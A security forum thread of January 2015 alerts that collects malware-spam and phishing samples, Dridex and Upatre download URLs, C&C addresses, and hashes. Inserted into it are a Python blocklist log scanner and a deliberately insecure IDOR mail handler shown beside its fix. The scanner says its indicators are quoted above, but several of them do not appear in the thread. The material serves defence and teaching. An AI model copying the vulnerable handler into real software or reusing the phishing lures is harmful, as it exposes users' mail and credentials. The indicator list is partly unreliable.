Fake 'ADP Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/johnny-west-adp-invoice-week-ending-01112015-fake-pdf-malware/
15 Jan 2015 - "'ADP Invoice for week ending 01/11/2015' pretending to come from Johnny.West@ adp .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.

15 January 2015: invoice_418270412.pdf.zip (11kb): Extracts to: invoice_418270412.pdf.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a33b2a98df1b9b973471de47ad8fc750278a42890ed5924bf3ea23cbd448db7d/analysis/1421335768/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.120.16.66: https://www.virustotal.com/en/ip-address/174.120.16.66/information/
69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___

Fake 'HSBC Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-advice-refgb956959-chaps-credits-fake-pdf-malware/
15 Jan 2015 - "'Payment Advice – Advice Ref:[GB956959] / CHAPS credits' pretending to come from HSBC Advising Service [mailto:Bankline.Administrator@ nutwest .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link or open the attachment... The email looks like:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link: <redacted>
Yours faithfully,
Global Payments and Cash Management
HSBC ...

When you follow the... link you get a page looking like this, where depending on which browser you are using, you might get a direct download of the zip file containing the -malware- or you might get the message to follow the link... which will give you the malware:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/avralab.jpg
15 January 2015: doc974_pdf.zip (11kb) : Extracts to: doc963_pdf.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4c00deb8efcca9de6a86809eeb6613037d4820a56923bf4c262367c4c744f69e/analysis/1421341083/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
66.147.240.173: https://www.virustotal.com/en/ip-address/66.147.240.173/information/

:fear::fear: :mad:
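The dynamoo posts above end with recommended blocklists, including a whole /18 (95.163.64.0/18) rather than single addresses. Here is an added example of how I would turn such a list into a check over egress logs so the 8080 beaconing they describe is caught; this is my own code, not from dynamoo.com or the original post. The indicators are the ones quoted above (the page writes hostnames with a defanging space, joined here), and the log lines are constructed for the example, not taken from any real capture.

```python
import ipaddress
import re

# Indicators quoted in the 14/15 Jan 2015 posts above: Dridex C&C, download hosts
# and the DINETHOSTING range the author recommends blocking outright.
BLOCKLIST = [
    "59.148.196.153", "74.208.11.204", "81.27.38.97",
    "194.146.136.1", "95.163.121.71", "95.163.121.72",
    "136.243.237.204", "80.237.255.196",
    "95.163.64.0/18",
    "okurimono.ina-ka.com",
]

# Constructed firewall/proxy-style log (not from the original page). 203.0.113.7 and
# 93.184.216.34 are documentation/example addresses used as benign filler.
SAMPLE_LOG = """\
2015-01-15 08:51:02 src=10.0.0.12 dst=74.208.11.204 dport=8080 proto=tcp host=-
2015-01-15 08:51:09 src=10.0.0.12 dst=95.163.121.200 dport=8080 proto=tcp host=-
2015-01-15 08:52:40 src=10.0.0.45 dst=95.163.200.5 dport=443 proto=tcp host=-
2015-01-15 08:53:11 src=10.0.0.45 dst=203.0.113.7 dport=80 proto=tcp host=okurimono.ina-ka.com
2015-01-15 08:54:00 src=10.0.0.9 dst=93.184.216.34 dport=443 proto=tcp host=example.com
this line is not in the expected format and is skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) .*?dst=(?P<dst>\S+) dport=(?P<dport>\d+) .*?host=(?P<host>\S+)"
)


def compile_blocklist(entries):
    """Split entries into IP networks (single IPs become /32) and hostnames."""
    nets, hosts = [], set()
    for e in entries:
        try:
            nets.append(ipaddress.ip_network(e, strict=False))
        except ValueError:
            hosts.add(e.lower().rstrip("."))
    return nets, hosts


def match_indicator(dst, host, nets, hosts):
    """Return the blocklist entry that dst or host matches, or None.
    Networks are checked in list order, so put specific IPs before wide ranges
    if you want the most specific indicator reported."""
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        ip = None
    if ip is not None:
        for n in nets:
            if ip in n:
                return str(n) if n.num_addresses > 1 else str(n.network_address)
    if host and host.lower().rstrip(".") in hosts:
        return host.lower().rstrip(".")
    return None


def scan_log(text, entries=BLOCKLIST):
    """Return one hit record per log line whose destination matches the blocklist."""
    nets, hosts = compile_blocklist(entries)
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed lines are skipped, not treated as clean
        indicator = match_indicator(m["dst"], m["host"], nets, hosts)
        if indicator:
            hits.append({"ts": m["ts"], "dst": m["dst"],
                         "dport": int(m["dport"]), "indicator": indicator})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']}  {h['dst']}:{h['dport']}  matched {h['indicator']}")
```

Note that 95.163.121.200 is reported against the /18 even though it is not one of the two addresses named in the post, which is exactly why the author suggests blocking the range: the operators can move within it without touching the list. The host= match covers proxy logs where the C&C is reached by name through a shared IP, as with the okurimono.ina-ka.com entry.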

AplusWebMaster
2015-01-16, 13:53
FYI...

Affordable Care Act Phishing Campaign
- https://www.us-cert.gov/ncas/current-activity/2015/01/15/Affordable-Care-Act-Phishing-Campaign
Jan 15, 2015 - "US-CERT is aware of a phishing campaign purporting to come from a U.S. Federal Government Agency. The phishing emails reference the Affordable Care Act in the subject and claim to direct users to health coverage information, but instead direct them to sites which attempt to elicit private information or install malicious code. US-CERT encourages users to take the following measures to protect themselves:
- Do not follow links or download attachments in unsolicited email messages.
- Maintain up-to-date antivirus software.
- Refer to the Avoiding Social Engineering and Phishing Attacks Security Tip* for additional information on social engineering attacks..."
* https://www.us-cert.gov/ncas/tips/ST04-014
___

Fake 'voice mail' SPAM - PDF malware
- http://myonlinesecurity.co.uk/microsoft-outlook-voicemail-received-voice-mail-fake-pdf-malware/
16 Jan 2015 - "'You have received a voice mail' pretending to come from Microsoft Outlook Voicemail <no-reply@your own domain> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE549-693-8777.wav (20 KB)
Caller-Id: 549-693-8777
Message-Id: 8X3NI1
Email-Id: a.j.lefeber14d @ ...
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

They are not being sent by your own server or email server, but by one of the botnets...
16 January 2015: VOICE44982109219.zip (11kb) : Extracts to: VOICE44982109219.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e1c3617c620614697485b45bb6760e94cea16758c15fa0374629c4a15b54be08/analysis/1421413445/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.16.192: https://www.virustotal.com/en/ip-address/192.185.16.192/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___

Adobe Phish back in-the-Wild
- https://blog.malwarebytes.org/fraud-scam/2015/01/adobe-phish-back-in-the-wild/
Jan 15, 2015 - "We recently found a -compromised- site serving what appears to be an Adobe phish. Like most phishing campaigns, this one may have originated from a spammed email. Although we do not have the actual sample of said email, it pays to be familiar with what the fraud page looks like and its content, too. Please direct your attention to the screenshot below:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/00-default.png
We can deduce from the page’s content that the spam may have originated from a spoofed Adobe address, promising an important document the recipient has to see. In order to do so, they are then instructed to access their Adobe account by entering their email credentials, specifically for AOL, Gmail, Outlook, and Yahoo! The page also caters to credentials for other email providers. Visitors clicking either of the email service brands at the right side of the page changes the user entry fields at the left side to match with the look of the real thing... Some of us may quickly and easily identify that the whole thing is a phishing campaign, but some may also not realize this until it’s too late. Be extra careful when dealing with emails purporting to have come from Adobe... It also pays to remain informed and read Adobe’s page here* on how to avoid falling for phishing schemes."
* https://www.adobe.com/security/prevent-phishing.html
___

North Korean News Agency site serves File Infector
- http://blog.trendmicro.com/trendlabs-security-intelligence/north-korean-news-agency-website-serves-file-infector/
Jan 16, 2015 - "We were recently alerted to reports* claiming that the website North Korea’s official news service, www.kcna .kp, had been delivering -malware- via embedded malicious code. One of the photo spreads on the website was found to contain malware that launched a watering hole attack on individuals who came to visit the website and its other pages. Below is an infection diagram for the malware associated with this attack:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Diagram2.jpg
The mother file in this attack is detected as PE_WINDEX.A-O. As seen in the diagram above, the executable file mscaps.exe drops wtime32.dll, which contains the infection code and backdoor routine. Another executable file mscaps.exe injects code to explorer.exe to stay memory resident. As such, every time the affected system reboots, the malware runs on the system and begins its infection routine. Explorer.exe executes the infection code and targets .EXE files in drive types that are removable or shared, with drive letters traversed from A-Z. We observed that it skips fixed drives. Apart from explorer.exe, this file infector looks for the following processes where it injects its malicious code:
iexplore.exe
ieuser.exe
firefox.exe
chrome.exe
msimn.exe
msnmsgr.exe
outlook.exe
winmail.exe
yahoomessenger.exe
ftp.exe
The website contains an -infected- .ZIP file named FlashPlayer.zip. Our initial analysis shows that the outdated Flash Player installer drops the main file infector WdExt.exe, which we detect as PE_WINDEX.A-O. It copies and renames the file Ws2_32.dll, which is the file for the Windows Sockets API used by most Internet and network applications to handle network connections. PE_WINDEX.A-O also creates the file SP{random}.tmp, which contains system information that may be responsible for the malware’s information theft routines. It gathers data such as date and time, computer name, user name, OS information, MAC address, and more. The embedded malicious code runs on Internet Explorer version 11.0, Mozilla Firefox versions 10.0.9 and 36.0, Safari versions 7.0.3 and 4.0, Opera version 9.00 and 12.14, and Google Chrome 41.0.2228.0. The browsers we tested all displayed the code snippet that includes /download/FlashPlayer10.zip. Based on replicating the attack with an infected sample (calc.exe), we noticed that the file size is almost the same size as the mother file infector, PE_WINDEX.A-O. Additional analysis also shows that PE_WINDEX.A-O has developer metadata that lists its copyright as © Microsoft Corporation. All rights reserved with its publisher is listed as Microsoft Corporation. Its description and comments contain the text Windows Defender Extension, among other listed information. This may be a disguise for the malware so that users won’t be suspicious about the file..."
* http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/
___

Google finally quashes month-Old Malvertising Campaign
- http://it.slashdot.org/story/15/01/16/0129244/google-finally-quashes-month-old-malvertising-campaign
Jan 16, 2015 - "Since the middle of December, visitors to sites that run Google AdSense ads have intermittently found themselves -redirected- to other sites featuring spammy offerings for anti-aging and brain-enhancing products*. While webmasters who have managed to figure out which advertisers are responsible could quash the attacks on their AdSense consoles, only now has Google itself managed to track down the villains and -ban- them from the service."
* http://www.itworld.com/article/2871035/google-nixes-widespread-malvertising-attack.html
Jan 14, 2015

:fear::fear: :mad:

AplusWebMaster
2015-01-17, 18:45
FYI...

iTunes invoice – phish
- http://myonlinesecurity.co.uk/itunes-invoice-id31wx175t-phishing/
17 Jan 2015 - "'ITunes Your invoice #ID31WX175T' pretending to come from iTunes Store <do_not_reply@ btconnect .com> is one of the latest -phish- attempts to steal your Bank, credit card and personal details. This one is slightly different to usual ones in that it is designed to make you think that it is a mistake and that you need to enter all your bank/credit card details in order to -cancel- the transaction that you never made in the first place... persuading the recipient that somebody must have compromised their ITunes account and telling you to change all the details in it... not only would you lose a lot of money but could also end up losing a lot more. This one only wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well*...
* http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
looks at first glance like the genuine Itunes website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Store-Purchase-Confirmation.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format...make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."

:fear: :mad:

AplusWebMaster
2015-01-19, 15:09
FYI...

Fake 'order payment slip' SPAM - malware
- http://myonlinesecurity.co.uk/pierre-jude-bukasonventure-com-re-order-payment-slip-malware/
19 Jan 2015 - "'RE: order payment slip' coming from info@ bukasonventure .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is just to inform you that we have made the payment as Requested.
We try to contact you about the payment we made here in our office, but because the payment was made on Friday evening before the bank closed, and our server was down,
PLEASE REFER TO THE ATTACHMENT SLIP
Best regards,
Mr Pierre Jude Genaral Manager
323 Collier Road, Bayswater WA 6053
Phone: (1) 9379 0811
Fax: (1) 9379 0822 ...

These actually look like they are coming from bukasonventure .com which is hosted in USA and was only registered on 15 January 2015. This might be a compromised server, have an open relay allowing the emails to be sent, or have been registered under a false set of details with the aim of sending malicious emails and spam. The more I look at this one, the more I am convinced the entire set up has been done with the aim of distributing malware. The domain was registered on 15 January 2015. The computer sending IP 120.140.55.192 is listed as Malaysia...
19 January 2015: order-slip.rar : Extracts to: order-slip.exe
Current Virus total detections: 23/56* ... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbf4c8a93ae637d8436ede424b617003105b094cced64c712ec25c68c3a61988/analysis/1421652817/
___

Verizon vuln exposed email accounts - “zombie cookies”
- http://www.securityweek.com/verizon-fixes-vulnerability-exposing-user-email-accounts
Jan 19, 2015 - "... discovered the flaw while analyzing the Android app for Verizon’s fiber optic Internet, telephone and television service FiOS. While investigating the requests sent by the application, the expert noticed a username parameter called uid. By changing the value of this parameter with a different customer’s username, Westergren got the contents of the targeted user’s email account. The researcher* later determined that other API methods for this particular widget were affected as well. For example, by changing the values of the uid and mid parameters in a certain request, he could read individual emails. even managed to send out an email on another user’s behalf by exploiting the vulnerability... The proof-of-concept was sent to Verizon’s security team on January 14. The telecoms giant -confirmed- the existence of the issue by the next day. The vulnerability was fixed on January 16. For responsibly disclosing the security hole, Westergren was rewarded with free FiOS Internet for one year... had been using so-called “zombie cookies” to track subscribers even if they had used private browsing, cleared their cookies, or if they had opted out. The existence of Verizon’s controversial system came to light last year, but the company -denied- using the tracking method in its own business model. After being exposed... announced on Friday that it will suspend its “zombie cookies” program..."
* http://randywestergren.com/critical-vulnerability-verizon-mobile-api-compromising-user-email-accounts/
___

LockHeedMartin Fax Spam
- http://threattrack.tumblr.com/post/108560007998/lockheedmartin-fax-spam
Jan 19, 2015 - "Subjects Seen:
[Lockheed Martin UK Ltd Integrated Systems] New fax message - LFQ.71021C670.3249
Typical e-mail details:
FAX: +07755-090107
Date: 2015.01.18 17:33:18 CST
Pages: 4
Reference number: LFQ.71021C670.3249
Filename: curbed.zip

Lockheed Martin UK Ltd Integrated Systems Michaele Vivas

Malicious URLs:
breteau-photographe .com/tmp/pack.tar.gz
voigt-its .de/fit/pack.tar.gz
maisondessources .com/assets/pack.tar.gz
pleiade.asso .fr/piwigotest/pack.tar.gz
scolapedia .org/histoiredesarts/pack.tar.gz
Malicious File Name and MD5:
curbed .scr (BDFE7EB4A421B9A989C85BFFF7BACE2C)
1715030703 .exe (4ebd076047a04290f23f02d6ecd16fee)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/93353be3c5a5dd804da246f3da7ec037/tumblr_inline_nifqztQaEr1r6pupn.png

Tagged: LockHeedMartin, Citroni, dalexis
___

Fake 'Natwest' SPAM - leads to malware
- http://blog.dynamoo.com/2015/01/malware-spam-natwest.html
19 Jan 2015 - "This spam claiming to be from NatWest bank (or is it nEtwest?) leads to malware.
From: NatWest [donotreply@ netwest .uk]
Date: 19 January 2015 at 14:02
Subject: Important - Please complete attached form ...
Dear Customer
Please find below your Banking Form for Bankline.
<URL redacted>
Please complete Bankline Banking Form :
- Your Customer Id and User Id - which are available from your administrator if you have not already received them
Additionally, if you wish to access Bankline training, simply follow the link below
<URL redacted>
If you have any queries or concerns, please telephone your Electronic Banking Help Desk.
National Westminster Bank Plc, Registered in England No. 929027. Registered Office: 135 Bishopsgate, London EC2M 3UR.
Authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority...

In this case the link in the email goes to www .ipawclp .com/NEW-IMPORTANT-NATWEST_FORM/new.bankline_document .html where it hits a couple of scripts at:
http ://restaurantratiobeach .ro/js/jquery-1.39.15.js
http ://utokatalin .ro/js/jquery-1.39.15.js
In turn, that leads to a ZIP file download which contains an EXE file which is slightly different each time it downloads, with low detection rates in all cases [1] [2] [3]. The name of the ZIP file and EXE varies, but is in the format doc12345.exe and doc54321.zip. Of note is a sort-of-informational screen on the download page:
> https://2.bp.blogspot.com/-BbZFLI01zzE/VL0eAGDsU8I/AAAAAAAAGIQ/MlAa94-Kmlc/s1600/fake-natwest.png
Automated analysis is presently inconclusive...
UPDATE:
@snxperxero suggests blocking the following sites:
202.153.35.133
loveshopclothing .com
credit490 .com "
1] https://www.virustotal.com/en/file/22599e7a2aa4c5d047fe075a7dec1e8aba4945dc08b79137571175d1703b0d70/analysis/1421678510/

2] https://www.virustotal.com/en/file/c955cefd43d594af4f36a5442878498e446ac80d63810b5052e852ea46a99d57/analysis/1421678516/

3] https://www.virustotal.com/en/file/76c76752649a6241f28d3134df5069c58296d3888a9bac17c6b4ccec843658fb/analysis/1421678522/
___

Fake 'Insurance Inspection' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
19 Jan 2015 - "This spam does -not- come from FMG Support Group Ltd, but instead it is a forgery. FMG are -not- sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From: repairermessages@ fmg .co.uk
Date: 19 January 2015 at 07:24
Subject: Insurance Inspection Arranged AIG02377973
FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.
Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@ fmg .co.uk
FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.
Tel: 0844 243 8888 ...

Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least -two- different versions, neither of which are detected by AV vendors [1] [2]. These documents contain -two- slightly different malicious macros... which attempt to download a further component from:
http ://chilan .ca/js/bin.exe
http ://techno-kar .ru/js/bin.exe
This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57*. The Malwr report shows it attempting to communicate with the following IPs:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These two IP addresses have been used by this -malware- for a long time; I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53**."
1] https://www.virustotal.com/en/file/2ba965fec6d3f369b617ec192376feb53673577af88fb218dd15dc33069384bb/analysis/1421656771/

2] https://www.virustotal.com/en/file/5afe6253b435668f7fb449bd75a53532f9237e738f4bbc83c511bdbd4df81fab/analysis/1421657737/
___

Fake '19TH JANUARY 2015.doc' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-traci-wilson.html
19 Jan 2015 - "This rather terse spam does -not- actually come from Davies Crane Hire, but it is a -forgery- with a malicious Word document attached. Davies Crane Hire have not been hacked or compromised, and they are -not- sending out this spam.
From: Traci Wilson [t.wilson@ daviescranehire .co.uk]
Date: 19 January 2015 at 09:05
Subject: 19TH JANUARY 2015.doc

There is -no- body text, just an attachment called 19TH JANUARY 2015.doc which contains a malicious macro.
The documents in use and the payload are identical to this spam run* that preceded it. At the moment, everything has a very low detection rate. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html

- http://myonlinesecurity.co.uk/traci-wilson-daviescranehire-co-uk-19th-january-2015-xlsx-word-doc-malware/
19 Jan 2015
___

Fake 'tax refund' Phish...
- http://myonlinesecurity.co.uk/hm-revenue-customs-received-tax-refund-payment-phishing/
19 Jan 2015 - "'HM Revenue and Customs – You have received a tax refund payment !' is an email pretending to come from HM Revenue & Customs <tax@ hmrc .gov .uk> . One of the major common subjects in a phishing attempt is -Tax returns- where especially in the UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... If you follow the link you see a webpage looking like this where they want your email address and name:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want -all- your banking and credit information:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish2.png
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear: :mad:
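The Verizon API flaw quoted above is a textbook insecure direct object reference: the server required a login but then let a client-supplied uid choose whose mailbox to return. Added example (not from SecurityWeek or the researcher's write-up): the trusting handler next to a hardened one that derives the mailbox owner from the session, with constructed session and mailbox tables and made-up function names.

```python
"""Added example: IDOR on a 'uid' parameter, vulnerable vs. hardened handler.
Sessions, mailboxes and handler names are all constructed for illustration."""

from dataclasses import dataclass, field

# Constructed sample data: two customers, each with a private inbox.
MAILBOXES = {
    "alice": ["Your FiOS bill is ready", "Appointment confirmed"],
    "bob": ["Password reset requested"],
}

# Constructed session table: opaque session token -> authenticated username.
SESSIONS = {"tok-alice-1": "alice", "tok-bob-1": "bob"}


class Forbidden(Exception):
    """Raised when the caller may not read the requested resource."""


@dataclass
class Request:
    session_token: str
    params: dict = field(default_factory=dict)


def authenticate(req: Request) -> str:
    """Map a session token to the user who logged in, failing closed."""
    try:
        return SESSIONS[req.session_token]
    except KeyError:
        raise Forbidden("no valid session")


def vulnerable_inbox(req: Request) -> list:
    """Insecure direct object reference: the handler only checks that
    *someone* is logged in, then trusts the client-supplied uid to pick
    the mailbox. Any authenticated user can read any other user's mail."""
    authenticate(req)                 # login required, but...
    uid = req.params["uid"]           # ...the target comes from the client
    return MAILBOXES[uid]


def hardened_inbox(req: Request) -> list:
    """Fix: the mailbox owner is taken from the session, never from the
    request. A uid parameter, if present, must match the session user or
    the call is refused; it is never used as the lookup key."""
    user = authenticate(req)
    requested = req.params.get("uid", user)
    if requested != user:
        raise Forbidden(f"{user} may not read mailbox {requested!r}")
    return MAILBOXES[user]


def demo() -> dict:
    """Run both handlers with bob logged in but asking for alice's uid, and
    report what each one did so the difference is checkable."""
    cross_user = Request("tok-bob-1", {"uid": "alice"})
    result = {"vulnerable": vulnerable_inbox(cross_user)}
    try:
        hardened_inbox(cross_user)
        result["hardened"] = "allowed"
    except Forbidden:
        result["hardened"] = "denied"
    return result


if __name__ == "__main__":
    print(demo())
```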

AplusWebMaster
2015-01-20, 14:43
FYI...

Fake 'Proforma Invoice' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
20 Jan 2015 - "This -fake- invoice leads to malware. It is not being sent by Big K Products UK Ltd, their systems have not been hacked or compromised. Instead, the email is a -forgery- designed to get you to click the malicious attachment.
From: Monika [monika.goetz@ bigk .co.uk]
Date: 20 January 2015 at 07:18
Subject: Proforma Invoice
Please find enclosed the proforma invoice for your order. Please let me know when payment has been made, so that the goods can be despatched.
Kind regards,
Monika Goetz
Sales & Marketing Co-ordinator

The document attached is Proforma.doc which is currently undetected by AV vendors. It contains a malicious macro... which attempts to download a binary from:
http ://solutronixfze .com/js/bin.exe
..which is saved to %TEMP%\324234234.exe. This has a VirusTotal detection rate of 2/56* and the Malwr report shows it attempting to phone home to:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These IPs have been used many times in similar recent attacks and I recommend you block them. It also drops a DLL with a VirusTotal detection rate of 2/57**. The payload appears to be the Dridex banking trojan. See also this post*** about a related spam run also in progress this morning."
* https://www.virustotal.com/en/file/0dd553a3e401941a044412406dee6c83fc193bb5c5d19140c61a11aa0e346503/analysis/1421744001/

** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421744963/

*** http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html

- http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
20 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Big-K-proforma-invoice.png

> https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/
___

Fake 'Barclays Online Bank [security-update]' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-barclays-important-update.html
20 Jan 2015 - "This -fake- Barclays spam leads to malware.
From: Barclays Online Bank [security-update@ barclays .com]
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: <URL redacted>
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused...

The link in the email varies, some other examples seen are:
http ://nrjchat .org/ONLINE~IMPORTANT-UPDATE/last-update.html
http ://utokatalin .ro/ONLINE-BANKING_IMPORTANT/update.html
http ://cab .gov .ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some javascript hoops, and then leads to a ZIP file download which contains a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http ://202.153.35.133 :33384/2001uk11/HOME/0/51-SP3/0/
http ://202.153.35.133 :33384/2001uk11/HOME/1/0/0/
http ://clicherfort .com/mandoc/eula012.pdf
http ://202.153.35.133 :33387/2001uk11/HOME/41/7/4/
http ://essextwp .org/mandoc/ml1from1.tar
Out of these 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe which has a VirusTotal detection rate of just 3/57* and is identified as Dyreza.C by Norman anti-virus."
1] https://www.virustotal.com/en/file/dc887426e0b4c62b8c33fe9b7e549a0b86a54a44c65088ac8726755259962571/analysis/1421768747/

2] https://www.virustotal.com/en/file/e08439b97ceba3e38852ed22df7b402837305b3f973cd134f8d1d90a6a8d4377/analysis/1421768757/

3] https://www.virustotal.com/en/file/0c0e38af5c842905e74fc361ee6c33e0a3a3ebdd3d342f8acb601e0c21c89349/analysis/1421768766/

* https://www.virustotal.com/en/file/ebf8570dfc744a3a1b14cc2b04f2cd2c4c5271403a42bdd77b8b743be27d89c4/analysis/1421770305/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/

- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-2/
20 Jan 2015
* https://www.virustotal.com/en/file/ad7a94f2091cee47b6406f4e1db03c57b537fab9707551f27e2b6cf541faf6ca/analysis/1421769761/

- http://threattrack.tumblr.com/post/108646232563/barclays-important-update-spam
Jan 20, 2015
Tagged: Barclays, Upatre
___

Fake 'Delivery Confirmation' SPAM – doc malware
- http://myonlinesecurity.co.uk/mereway-kitchens-delivery-confirmation-word-doc-malware/
20 Jan 2015 - "'mereway kitchens Delivery Confirmation' pretending to come from mereway kitchens <sales.north@ mereway .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... 2 versions of this spreading today. In one version once again the body of the email is completely -blank- ... and the malware is the same as today’s version of Proforma Invoice Monika big K – Word doc malware*. The second version also having the same malware just simply says 'Delivery Confirmation'..."
* http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/

